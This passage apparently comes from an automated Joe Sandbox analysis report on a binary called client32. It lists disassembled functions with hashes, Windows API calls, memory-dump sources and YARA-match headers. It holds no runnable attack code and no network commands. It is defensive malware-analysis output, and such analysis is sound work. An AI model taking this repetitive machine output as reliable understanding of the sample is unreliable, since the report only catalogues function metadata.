                                                                              • Instruction ID: 2ae3116f5df8233203c0b5b7c047d092e18a9fbb085bfb1a1d8cc4b180184980
                                                                              • Opcode Fuzzy Hash: fda338b6a51c78fe6c2f886b68065117b2ed91385ddfdaae507fd395cc0aabb8
                                                                              • Instruction Fuzzy Hash: F331C576E43232EBE212DBD9CC80FB6B798A745B68F514135F928972C8D2706841CFD0
                                                                              Function 11179775 Relevance: 6.1, APIs: 4, Instructions: 103COMMONLIBRARYCODE
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • _LocaleUpdate::_LocaleUpdate.LIBCMT ref: 111797A9
                                                                              • __isleadbyte_l.LIBCMT ref: 111797DC
                                                                              • MultiByteToWideChar.KERNEL32(840FFFF8,00000009,00000109,50036AD0,00BFBBEF,00000000,?,?,?,1117A3D8,00000109,00BFBBEF,00000003), ref: 1117980D
                                                                              • MultiByteToWideChar.KERNEL32(840FFFF8,00000009,00000109,00000001,00BFBBEF,00000000,?,?,?,1117A3D8,00000109,00BFBBEF,00000003), ref: 1117987B
                                                                              Memory Dump Source
                                                                              • Source File: 00000004.00000002.3403939531.0000000011001000.00000020.00000001.01000000.00000007.sdmp, Offset: 11000000, based on PE: true
                                                                              • Associated: 00000004.00000002.3403921570.0000000011000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404050484.0000000011194000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404087109.00000000111E2000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404125914.00000000111F1000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.00000000111F7000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.000000001125D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.0000000011288000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.000000001129E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.00000000112AD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.00000000112B4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.00000000112DF000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.000000001132B000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_4_2_11000000_client32.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: ByteCharLocaleMultiWide$UpdateUpdate::___isleadbyte_l
                                                                              • String ID:
                                                                              • API String ID: 3058430110-0
                                                                              • Opcode ID: 8a143442f0c1ddc808179669c8bda0f547e04561d024046af250b3c99ddd2ce0
                                                                              • Instruction ID: dd7da2bd4d1e27f38930cbdbffb8ca2b0741d821671db88b966082c1cf8912a5
                                                                              • Opcode Fuzzy Hash: 8a143442f0c1ddc808179669c8bda0f547e04561d024046af250b3c99ddd2ce0
                                                                              • Instruction Fuzzy Hash: 1331AE31A0029EEFEB01DF64C9849AEFFA6EF01330F1585A9E4648B290F730D954CB51
                                                                              Function 110B3700 Relevance: 6.1, APIs: 4, Instructions: 95COMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • EnterCriticalSection.KERNEL32(0000002C,EE49F673,?,?,?,00000000,?,Function_0018B2A8,000000FF,?,1103DE10,?,?,?,00000000), ref: 110B372F
                                                                              • LeaveCriticalSection.KERNEL32(0000002C,?,00000000,?,Function_0018B2A8,000000FF,?,1103DE10,?,?,?,00000000), ref: 110B376F
                                                                              • SetEvent.KERNEL32(?), ref: 110B37EA
                                                                              • LeaveCriticalSection.KERNEL32(0000002C), ref: 110B37F1
                                                                              Memory Dump Source
                                                                              • Source File: 00000004.00000002.3403939531.0000000011001000.00000020.00000001.01000000.00000007.sdmp, Offset: 11000000, based on PE: true
                                                                              • Associated: 00000004.00000002.3403921570.0000000011000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404050484.0000000011194000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404087109.00000000111E2000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404125914.00000000111F1000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.00000000111F7000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.000000001125D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.0000000011288000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.000000001129E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.00000000112AD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.00000000112B4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.00000000112DF000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.000000001132B000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_4_2_11000000_client32.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: CriticalSection$Leave$EnterEvent
                                                                              • String ID:
                                                                              • API String ID: 3394196147-0
                                                                              • Opcode ID: 41462067ee8128c784213e06cad4e855516fce30d8963978b3823cfd81d7b6d6
                                                                              • Instruction ID: 8acebb29280036c6a802c58c088d91b2f5c0a2bed23f5f36a778171c733041f7
                                                                              • Opcode Fuzzy Hash: 41462067ee8128c784213e06cad4e855516fce30d8963978b3823cfd81d7b6d6
                                                                              • Instruction Fuzzy Hash: BC314A75A44B059FD325CF69C980B9AFBE4FB48314F10862EE85AC7B50EB34A850CB90
                                                                              Function 11043660 Relevance: 6.1, APIs: 4, Instructions: 84windowCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                                • Part of subcall function 110684E0: EnterCriticalSection.KERNEL32(?,EE49F673,00000000,00002710,00000001,11027140,EE49F673,00000000,00002710,?,?,00000000,11182BE8,000000FF,?,110294CE), ref: 1106858A
                                                                              • SendMessageA.USER32(?,000006D4,00000000,00000000), ref: 110436CA
                                                                              • GetWindowLongA.USER32(00000000,000000F0), ref: 110436D1
                                                                              • IsWindow.USER32(00000000), ref: 110436DE
                                                                              • GetWindowRect.USER32(00000000,1104A5A0), ref: 110436F5
                                                                              Memory Dump Source
                                                                              • Source File: 00000004.00000002.3403939531.0000000011001000.00000020.00000001.01000000.00000007.sdmp, Offset: 11000000, based on PE: true
                                                                              • Associated: 00000004.00000002.3403921570.0000000011000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404050484.0000000011194000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404087109.00000000111E2000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404125914.00000000111F1000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.00000000111F7000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.000000001125D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.0000000011288000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.000000001129E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.00000000112AD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.00000000112B4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.00000000112DF000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.000000001132B000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_4_2_11000000_client32.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: Window$CriticalEnterLongMessageRectSectionSend
                                                                              • String ID:
                                                                              • API String ID: 3558565530-0
                                                                              • Opcode ID: 7a348eb1ebbebf4d087ed6f90251ea71c232aa61dd705a63114693f89344e778
                                                                              • Instruction ID: d8135c0911b88fc1f510a9c52ef20d21577c3519517ef8ed33f3b43d0edb38f0
                                                                              • Opcode Fuzzy Hash: 7a348eb1ebbebf4d087ed6f90251ea71c232aa61dd705a63114693f89344e778
                                                                              • Instruction Fuzzy Hash: 3121A276E45259ABD714CF94DA80B9DF7B8FB45724F204269E82597780DB30A900CB54
                                                                              Function 11143070 Relevance: 6.0, APIs: 4, Instructions: 49COMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • SetBkColor.GDI32(?,?), ref: 11143091
                                                                              • SetRect.USER32(?,?,?,?,?), ref: 111430A9
                                                                              • ExtTextOutA.GDI32(?,00000000,00000000,00000002,?,00000000,00000000,00000000), ref: 111430C0
                                                                              • SetBkColor.GDI32(?,00000000), ref: 111430C8
                                                                              Memory Dump Source
                                                                              • Source File: 00000004.00000002.3403939531.0000000011001000.00000020.00000001.01000000.00000007.sdmp, Offset: 11000000, based on PE: true
                                                                              • Associated: 00000004.00000002.3403921570.0000000011000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404050484.0000000011194000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404087109.00000000111E2000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404125914.00000000111F1000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.00000000111F7000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.000000001125D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.0000000011288000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.000000001129E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.00000000112AD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.00000000112B4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.00000000112DF000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.000000001132B000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_4_2_11000000_client32.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: Color$RectText
                                                                              • String ID:
                                                                              • API String ID: 4034337308-0
                                                                              • Opcode ID: 26f6cc05d1df662940a62fe5a538b52049d671c1388398b7ccd782556aa038f2
                                                                              • Instruction ID: e9225e88152d902865c43eb673e3150d6d7e7d22167fd17714d79550e5345a2a
                                                                              • Opcode Fuzzy Hash: 26f6cc05d1df662940a62fe5a538b52049d671c1388398b7ccd782556aa038f2
                                                                              • Instruction Fuzzy Hash: 0C012C7264021CBBDB04DEA8DD81FEFB3ACEF49604F104159FA15A7280DAB0AD018BA5
                                                                              Function 110675A0 Relevance: 6.0, APIs: 4, Instructions: 48windowCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • SetEvent.KERNEL32 ref: 110675BB
                                                                              • PeekMessageA.USER32(?,00000000,00000000,00000000,00000001), ref: 110675EC
                                                                              • DispatchMessageA.USER32(?), ref: 110675F6
                                                                              • PeekMessageA.USER32(?,00000000,00000000,00000000,00000001), ref: 11067604
                                                                              Memory Dump Source
                                                                              • Source File: 00000004.00000002.3403939531.0000000011001000.00000020.00000001.01000000.00000007.sdmp, Offset: 11000000, based on PE: true
                                                                              • Associated: 00000004.00000002.3403921570.0000000011000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404050484.0000000011194000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404087109.00000000111E2000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404125914.00000000111F1000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.00000000111F7000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.000000001125D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.0000000011288000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.000000001129E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.00000000112AD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.00000000112B4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.00000000112DF000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.000000001132B000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_4_2_11000000_client32.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: Message$Peek$DispatchEvent
                                                                              • String ID:
                                                                              • API String ID: 4257095537-0
                                                                              • Opcode ID: 3db10011ce53d706413e1f321e5ef86fa62babbb723f360e03787fab8b25e9f7
                                                                              • Instruction ID: aec9ad63bee144445ad482119ba180fbd35a23c038e7556534d76a428b5108da
                                                                              • Opcode Fuzzy Hash: 3db10011ce53d706413e1f321e5ef86fa62babbb723f360e03787fab8b25e9f7
                                                                              • Instruction Fuzzy Hash: E701B171A40205ABE704DE94CC81F96B7ADAB88714F5001A5FA14AF1C5EBB5A541CBF0
                                                                              Function 1115F1F0 Relevance: 6.0, APIs: 4, Instructions: 26COMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • GlobalDeleteAtom.KERNEL32(00000000), ref: 1115F208
                                                                              • GlobalDeleteAtom.KERNEL32 ref: 1115F212
                                                                              • GlobalDeleteAtom.KERNEL32 ref: 1115F21C
                                                                              • SetWindowLongA.USER32(?,000000FC,?), ref: 1115F22C
                                                                              Memory Dump Source
                                                                              • Source File: 00000004.00000002.3403939531.0000000011001000.00000020.00000001.01000000.00000007.sdmp, Offset: 11000000, based on PE: true
                                                                              • Associated: 00000004.00000002.3403921570.0000000011000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404050484.0000000011194000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404087109.00000000111E2000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404125914.00000000111F1000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.00000000111F7000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.000000001125D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.0000000011288000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.000000001129E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.00000000112AD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.00000000112B4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.00000000112DF000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.000000001132B000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_4_2_11000000_client32.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: AtomDeleteGlobal$LongWindow
                                                                              • String ID:
                                                                              • API String ID: 964255742-0
                                                                              • Opcode ID: 6d1c3e4c7ba79be894aa668b9e160f569f6102aeba86935b87fce5edf1bf1130
                                                                              • Instruction ID: 220dc2ec1870e2cd5bb434e19042b50d90bfbecd9004e1d9cbcb935e023cb0cc
                                                                              • Opcode Fuzzy Hash: 6d1c3e4c7ba79be894aa668b9e160f569f6102aeba86935b87fce5edf1bf1130
                                                                              • Instruction Fuzzy Hash: 97E065B910423697C7149F6AAC40D72F3ECAF98614715452DF175C3594C778D445DB70
                                                                              Function 11007255 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 185windowCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                                • Part of subcall function 111101B0: _malloc.LIBCMT ref: 111101C9
                                                                                • Part of subcall function 111101B0: wsprintfA.USER32 ref: 111101E4
                                                                                • Part of subcall function 111101B0: _memset.LIBCMT ref: 11110207
                                                                              • CreateWindowExA.USER32(00000000,edit,00000000,40040004,?,?,?,?,?,00000002,00000000,?), ref: 110073A7
                                                                              • SetFocus.USER32(?), ref: 11007403
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000004.00000002.3403939531.0000000011001000.00000020.00000001.01000000.00000007.sdmp, Offset: 11000000, based on PE: true
                                                                              • Associated: 00000004.00000002.3403921570.0000000011000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404050484.0000000011194000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404087109.00000000111E2000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404125914.00000000111F1000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.00000000111F7000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.000000001125D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.0000000011288000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.000000001129E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.00000000112AD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.00000000112B4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.00000000112DF000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.000000001132B000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_4_2_11000000_client32.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: CreateFocusWindow_malloc_memsetwsprintf
                                                                              • String ID: edit
                                                                              • API String ID: 1305092643-2167791130
                                                                              • Opcode ID: 08210b6cc54d90016c50a1c773d08534ce649efc3e71ddb39b7928ec6fe8f9a3
                                                                              • Instruction ID: e81607fb03d3f2f95005a1d43bd356d739516b9639758e6caabf034df3046c31
                                                                              • Opcode Fuzzy Hash: 08210b6cc54d90016c50a1c773d08534ce649efc3e71ddb39b7928ec6fe8f9a3
                                                                              • Instruction Fuzzy Hash: A2519FB5A00606AFE715CF64DC81BAFB7E5FB88354F118569E955C7340EB34AA02CB60
                                                                              Function 11009270 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 116COMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • std::_Xinvalid_argument.LIBCPMT ref: 110092E5
                                                                              • _memmove.LIBCMT ref: 11009336
                                                                                • Part of subcall function 11008DD0: std::_Xinvalid_argument.LIBCPMT ref: 11008DEA
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000004.00000002.3403939531.0000000011001000.00000020.00000001.01000000.00000007.sdmp, Offset: 11000000, based on PE: true
                                                                              • Associated: 00000004.00000002.3403921570.0000000011000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404050484.0000000011194000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404087109.00000000111E2000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404125914.00000000111F1000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.00000000111F7000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.000000001125D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.0000000011288000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.000000001129E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.00000000112AD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.00000000112B4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.00000000112DF000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.000000001132B000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_4_2_11000000_client32.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: Xinvalid_argumentstd::_$_memmove
                                                                              • String ID: string too long
                                                                              • API String ID: 2168136238-2556327735
                                                                              • Opcode ID: 22491d451eb23d87cec3ea30fc5d884b072beb3f123d3bfee90730829ce68beb
                                                                              • Instruction ID: dd3894f676f01ff6a75acb4aa2435548b18b289b65f075ee81d5ee4d5d084719
                                                                              • Opcode Fuzzy Hash: 22491d451eb23d87cec3ea30fc5d884b072beb3f123d3bfee90730829ce68beb
                                                                              • Instruction Fuzzy Hash: 8C31DB72B046108BF720DE9DE88099EF7EDEB957B4B20491FE589C7680E771AC4087A0
                                                                              Function 110E1260 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 109COMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000004.00000002.3403939531.0000000011001000.00000020.00000001.01000000.00000007.sdmp, Offset: 11000000, based on PE: true
                                                                              • Associated: 00000004.00000002.3403921570.0000000011000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404050484.0000000011194000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404087109.00000000111E2000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404125914.00000000111F1000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.00000000111F7000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.000000001125D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.0000000011288000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.000000001129E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.00000000112AD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.00000000112B4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.00000000112DF000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.000000001132B000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_4_2_11000000_client32.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: Xinvalid_argument_memmovestd::_
                                                                              • String ID: string too long
                                                                              • API String ID: 256744135-2556327735
                                                                              • Opcode ID: f63589a1e1e49e26468f6bc49513f74121357c805117a5e251a3e538b8b1e039
                                                                              • Instruction ID: 4942d9d917c342fdb8aca387283afa0bcd15718542992abc979dc690a8db670a
                                                                              • Opcode Fuzzy Hash: f63589a1e1e49e26468f6bc49513f74121357c805117a5e251a3e538b8b1e039
                                                                              • Instruction Fuzzy Hash: 7931B372B152058F8724DE9EEC848EEF7EAEFD57613104A1FE442C7640DB31AC5187A1
                                                                              Function 1103B150 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 97COMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • _calloc.LIBCMT ref: 1103B162
                                                                              • _free.LIBCMT ref: 1103B25B
                                                                                • Part of subcall function 11029A70: GetLastError.KERNEL32(?,00000000,?), ref: 11029A8C
                                                                                • Part of subcall function 11029A70: wsprintfA.USER32 ref: 11029AD7
                                                                                • Part of subcall function 11029A70: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 11029B13
                                                                                • Part of subcall function 11029A70: ExitProcess.KERNEL32 ref: 11029B29
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000004.00000002.3403939531.0000000011001000.00000020.00000001.01000000.00000007.sdmp, Offset: 11000000, based on PE: true
                                                                              • Associated: 00000004.00000002.3403921570.0000000011000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404050484.0000000011194000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404087109.00000000111E2000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404125914.00000000111F1000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.00000000111F7000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.000000001125D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.0000000011288000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.000000001129E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.00000000112AD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.00000000112B4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.00000000112DF000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.000000001132B000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_4_2_11000000_client32.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: ErrorExitLastMessageProcess_calloc_freewsprintf
                                                                              • String ID: CLTCONN.CPP
                                                                              • API String ID: 183652615-2872349640
                                                                              • Opcode ID: 8337f5e747ebaeb2686f90dd4bebe07236585bab06edcc3415c76220b6505581
                                                                              • Instruction ID: 20d7259e8fe77d3daff0af84d5ff1d15e913130fc2269d1c6afd747bd8efee53
                                                                              • Opcode Fuzzy Hash: 8337f5e747ebaeb2686f90dd4bebe07236585bab06edcc3415c76220b6505581
                                                                              • Instruction Fuzzy Hash: F231C875A10B069AD310CF95C881BB7F3E4FF44318F048669E9598B641F774F905C3A5
                                                                              Function 1108F720 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 86COMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                                • Part of subcall function 111101B0: _malloc.LIBCMT ref: 111101C9
                                                                                • Part of subcall function 111101B0: wsprintfA.USER32 ref: 111101E4
                                                                                • Part of subcall function 111101B0: _memset.LIBCMT ref: 11110207
                                                                              • std::exception::exception.LIBCMT ref: 1108F7BC
                                                                              • __CxxThrowException@8.LIBCMT ref: 1108F7D1
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000004.00000002.3403939531.0000000011001000.00000020.00000001.01000000.00000007.sdmp, Offset: 11000000, based on PE: true
                                                                              • Associated: 00000004.00000002.3403921570.0000000011000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404050484.0000000011194000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404087109.00000000111E2000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404125914.00000000111F1000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.00000000111F7000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.000000001125D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.0000000011288000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.000000001129E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.00000000112AD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.00000000112B4000.00000002.00000001.01000000.00000007.sdmpDownload File
